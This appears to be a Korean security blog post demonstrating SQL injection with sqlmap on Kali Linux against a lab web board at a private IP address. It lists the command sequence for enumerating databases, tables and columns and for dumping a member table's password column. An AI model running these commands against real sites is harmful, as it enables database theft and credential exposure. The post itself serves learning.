일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- 라우팅프로토콜
- docker
- 컨테이너
- Routing
- OSI7계층
- MySQL
- 데이터베이스
- Snort Rule
- Python
- 도커
- TDD
- 코딩테스트
- Container
- Cosmos
- db
- database
- 스노트
- 프로그래머스
- 라우터
- 리눅스
- coding test
- Linux
- osi7layer
- 라우팅
- 트레바리
- programmers
- Router
- 코딩 테스트
- 스노트 룰
- snort
Archives
- Today
- Total
Simple is IT, 누구나 보고 누구나 깨닫는 IT
SQL 인젝션 (sqlmap 사용 - Kali Linux) 본문
자동화 도구(sqlmap, 하비지 등)
SQLmap 설치 : apt-get insatll sqlmap -y
sqlmap -u [공격 URL] --dbs //단, 공격 URL은 GET방식 데이터를 전달하는 주소, DBMS 종류 및 DB 이름 알아내기
sqlmap -u [공격 URL] -D [DB명] --tables // 테이블명 알아내기
sqlmap -u [공격 URL] -D [DB명] -T [테이블명] --columns // 테이블의 칼럼명 알아내기
sqlmap -u [공격 URL] -D [DB명] -T [테이블명] -C [칼럼명] --dump // 데이터 알아내기
|
sqlmap -u [URL] --dbs
sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 --dbs
DBMS 종류와 DB의 이름들이 출력되었다.
sqlmap -u [URL] -D [DB명] --tables
sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 -D board --tables
sqlmap -u [URL] -D [DB명] -T [TABLE] --columns
sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 -D board -T member --columns
sqlmap -u [URL] -D [DB명] -T [TABLE] -C [COLUMNS] --dump
sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 -D board -T member -C bPass --dump
이런 식으로 간편하게 SQL 인젝션을 수행할 수 있는 툴을 사용해보았다.
하지만 서버의 로그파일에 기록이 되기 때문에 발각될 확률이 매우 큰 방법이다.
'Simple is IT > Security' 카테고리의 다른 글
Metasploit Framework(메타스플로잇 프레임워크, reverse_shell) (0) | 2020.04.27 |
---|---|
nmap을 이용한 Port 정보수집 (0) | 2020.04.27 |
CSRF (Cross Site Request Forgery) 및 예방법 (0) | 2020.04.27 |
XSS(Cross Site Scripting, BeEF, Session Hijaking) 및 예방법 (0) | 2020.04.27 |
WEB 해킹 및 보안 취약점 파악(SQL 인젝션) (0) | 2020.04.27 |
Comments